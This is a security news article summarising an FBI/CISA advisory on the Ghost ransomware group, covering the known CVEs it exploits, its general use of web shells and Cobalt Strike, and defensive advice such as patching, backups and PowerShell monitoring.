Ethical Hacking News

The Ghost Ransomware Menace: A Persistent Threat to Global Cybersecurity

The Ghost ransomware crew remains active and potent, targeting unpatched systems and exploiting known vulnerabilities to infect targets. By understanding their tactics and taking proactive measures, organizations can reduce their risk of falling prey to this threat.

The Ghost ransomware crew is a notorious group that continues to haunt IT departments worldwide, targeting critical infrastructure and entities across various sectors.

The group's tactics remain consistent, exploiting known vulnerabilities in unpatched systems, including CVE-2018-13379, CVE-2010-2861, and CVE-2009-3960.

If an organization is not patched for these vulnerabilities, Ghost will likely move to its next target, even if it encounters hardened systems.

The group's attacks can result in the upload of a web shell backdoor, allowing them to steal process tokens, move laterally through the network, and infect more devices with malware.

The use of Cobalt Strike as a tool for deploying malware and moving laterally across networks is a key aspect of the Ghost gang's tactics.

Organizations can reduce their risk by patching vulnerabilities, maintaining backups, monitoring networks for suspicious activity, and taking other "Infosec 101" measures to prevent targeting.

The Ghost ransomware crew, a notorious group of cybercriminals, continues to haunt IT departments and organizations worldwide, wreaking havoc on critical infrastructure and entities across various sectors. According to a joint advisory issued by the FBI and the US Cybersecurity and Infrastructure Security Agency (CISA), this spectral menace remains active and potent, with victims in over 70 countries, including some in China.

The Ghost group first emerged in 2021 and has been identified by various aliases over time, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Despite the numerous names, their favored tactics remain consistent: targeting unpatched systems to exploit known vulnerabilities that allow them to infect targets. The group's preferred flaws include CVE-2018-13379, a critical path traversal flaw in Fortinet FortiOS appliances; CVE-2010-2861 and CVE-2009-3960 in servers running Adobe ColdFusion; CVE-2019-0604, a critical remote code execution vulnerability in Microsoft SharePoint; and CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, a series of flaws in Microsoft Exchange that can be chained together in ProxyShell attacks.

If an organization has applied patches for these problems or has adopted some other security controls, it is likely that Ghost will float right past their system and onto its next potential victim. The group's actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral movement to other devices.

If a target organization falls prey to the Ghost gang, they can expect a range of nefarious activities. After an initial compromise using known flaws, Ghost uploads a web shell backdoor to the compromised server, allowing the gang to use Windows Command Prompt and/or PowerShell to execute Cobalt Strike Beacon on that victim's Microsoft-powered system. A likely next move will be to use Cobalt Strike functionality to steal process tokens belonging to SYSTEM users. If Ghost gets those tokens, they'll use the elevated privileges they confer to move laterally through the network, run PowerShell commands on additional systems, and infect more devices with Cobalt Strike.

Cobalt Strike is a legitimate security-testing tool that has been co-opted by criminals who use cracked versions to deploy malware, move laterally across networks, and engage in other illicit activities. The Ghost gang uses the software to display a list of running processes, collect passwords that allow them to access more devices, and disable any antivirus software on compromised machines.

The FBI and CISA have issued a joint advisory warning organizations about the Ghost ransomware crew's tactics and providing guidance on how to prevent being targeted. The document includes a long list of indicators of compromise, including MD5 file hashes associated with Ghost ransomware activity and email addresses used in Ghost ransom notes. It also advises "Infosec 101" tactics such as patching known vulnerabilities and maintaining system backups.

In cases where backups were unaffected by the ransomware attack, victims often restored operations without needing to contact the Ghost actors or pay a ransom. The Feds have emphasized that monitoring networks for unauthorized use of PowerShell is also crucial in detecting potential Ghost infections.

The NSA and CISA have released a best-practices guide to help organizations detect and respond to potential Ghost ransomware attacks.

In conclusion, the Ghost ransomware crew represents a persistent threat to global cybersecurity, with its tactics evolving over time. By understanding their methods and taking proactive measures such as patching vulnerabilities, maintaining backups, and monitoring networks for suspicious activity, organizations can reduce their risk of falling prey to this menace.

Related Information:

https://go.theregister.com/feed/www.theregister.com/2025/02/20/fbi_beware_of_ghost_ransomware/

https://www.msn.com/en-us/crime/general/ghost-ransomware-crew-continues-to-haunt-it-depts-with-scarily-bad-infosec/ar-AA1zq1UD

https://forums.theregister.com/forum/all/2025/02/20/fbi_beware_of_ghost_ransomware/

https://nvd.nist.gov/vuln/detail/CVE-2018-13379

https://www.cvedetails.com/cve/CVE-2018-13379/

https://nvd.nist.gov/vuln/detail/CVE-2010-2861

https://www.cvedetails.com/cve/CVE-2010-2861/

https://nvd.nist.gov/vuln/detail/CVE-2009-3960

https://www.cvedetails.com/cve/CVE-2009-3960/

https://nvd.nist.gov/vuln/detail/CVE-2019-0604

https://www.cvedetails.com/cve/CVE-2019-0604/

https://nvd.nist.gov/vuln/detail/CVE-2021-34473